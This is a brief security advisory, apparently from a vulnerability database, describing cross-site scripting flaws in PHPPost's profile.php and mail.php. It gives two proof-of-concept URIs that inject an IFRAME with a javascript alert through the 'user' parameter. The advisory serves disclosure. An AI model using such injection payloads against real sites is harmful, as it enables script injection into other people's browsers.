PHPPost Multiple Cross-Site Scripting Vulnerabilities

PHPPost Multiple Cross-Site Scripting Vulnerabilities

No exploit is required.

Proof-of-concept URIs have been provided:

http://www.example.com/phpp/profile.php?user='%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
http://www.example.com/phpp/mail.php?user='%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E